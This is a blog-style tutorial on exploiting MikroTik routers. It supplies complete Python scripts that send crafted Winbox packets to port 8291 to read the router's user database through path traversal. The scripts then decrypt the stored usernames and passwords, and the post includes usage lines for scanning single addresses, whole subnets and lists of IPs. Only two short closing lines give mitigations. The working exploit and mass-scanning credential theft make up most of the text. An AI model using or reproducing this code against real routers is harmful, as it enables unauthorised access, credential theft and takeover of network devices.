Todays Topics "How to hack or Exploit Mikrotik Router and its Prevention" by python. So, you need to install python3 for executing this method.
If you are Windows user follow this step to install Python3
https://www.python.org/downloads/
Download this file and install as another application.
If you are Ubuntu/Debian user foloow this command to install Python3
$ apt-get install python3
after install Python3, you need to install Python Package manager pip by following this command
$ apt-get install python3-pip
If you are MAC user, follow this steps to install Python3
$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
export PATH=/usr/local/bin:/usr/local/sbin:$PATH
$ brew install python3
after install python3 and pip package manager as per your computer OS
Open python and create .py file with name of "loop.py" by following script
#code start
#!/usr/bin/env python3
import socket
import sys
from extract_user import dump
import ipcalc
import hashlib
import requests
import optparse
parser = optparse.OptionParser()
parser.add_option('-f', '--fileName',action="store", dest="fileName",help="enter text file", default="empty")
parser.add_option('-p', '--port',action="store", dest="port",help="enter deffrent port number", default="empty")
inputSw, args = parser.parse_args()
hello = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
0x00, 0x00]
getData = [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00]
if inputSw.port == "empty":
portNumber = 8291
else:
portNumber = int(inputSw.port)
if inputSw.fileName == "empty":
targets = ipcalc.Network(sys.argv[1])
else:
ipArray = []
for line in open(inputSw.fileName,"r"):
ipArray.append(line.strip())
targets = ipArray
for singleIp in targets:
ip = str(singleIp)
if __name__ == "__main__":
try:
#Socket
theSocket = socket.socket()
theSocket.settimeout(1)
theSocket.connect((ip, portNumber))
hello = bytearray(hello)
getData = bytearray(getData)
#get sesison id
theSocket.send(hello)
result = bytearray(theSocket.recv(1024))
#copy session id
getData[19] = result[38]
#Send Request
theSocket.send(getData)
result = bytearray(theSocket.recv(1024))
#Get results
print(ip, ' ', end='')
# print(d[55:])
# r = requests.get('http://ip-api.com/json/'+ip+'?fields=country,regionName,city,lat,lon,isp,org,as,reverse')
# print(r.json()['regionName'],',',r.json()['country'])
# print(r.json()['lat'],',',r.json()['lon'])
# print(r.json()['isp'])
# # print(r.json()['org'])
# print(r.json()['as'])
# print(r.json()['reverse'])
dump(result[55:])
except socket.timeout:
print(singleIp,": Connection Timeout")
except ConnectionRefusedError:
print(singleIp,": Connection Refused")
except ConnectionResetError:
print(singleIp,": Connection Reset")
except IndexError:
print(singleIp,": Index Error")
except socket.error:
print(singleIp,": Socket Error")
# code ended
and create another py file with name of "extract_user.py" by following bellow code
#code start here
#!/usr/bin/env python3
import sys, hashlib
def decrypt_password(user, pass_enc):
key = hashlib.md5(user + b"283i4jfkai3389").digest()
passw = ""
for i in range(0, len(pass_enc)):
passw += chr(pass_enc[i] ^ key[i % len(key)])
return passw.split("\x00")[0]
def extract_user_pass_from_entry(entry):
user_data = entry.split(b"\x01\x00\x00\x21")[1]
pass_data = entry.split(b"\x11\x00\x00\x21")[1]
user_len = user_data[0]
pass_len = pass_data[0]
username = user_data[1:1 + user_len]
password = pass_data[1:1 + pass_len]
return username, password
def get_pair(data):
user_list = []
entries = data.split(b"M2")[1:]
for entry in entries:
try:
user, pass_encrypted = extract_user_pass_from_entry(entry)
pass_plain = decrypt_password(user, pass_encrypted)
user = user.decode("ascii")
except UnicodeDecodeError:
user = "cannot decode"
pass_plain = "cannot decode"
except:
continue
user_list.append((user, pass_plain))
return user_list
def dump(data):
user_pass = get_pair(data)
for u, p in user_pass:
print('\n')
print("User:", u)
print("Pass:", p)
if(len(user_pass)):
print("------------------")
else:
print(': Unknown Sessionid')
# code end here
How to use
scan single ip: In script root dir
$ python3 loop.py 192.168.1.10
scan with different port
$ python3 loop.py 192.168.1.10 -p 8282
scan range of ip
$ python3 loop.py 192.168.1.0/24
scan list of IP from file
$ python3 loop.py -f list.txt
How to protect your router from Hacking and Explotion
1. Update your RouterOS and limit winbox login
2. Apply this firewall filter rule
ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
Comments
Post a Comment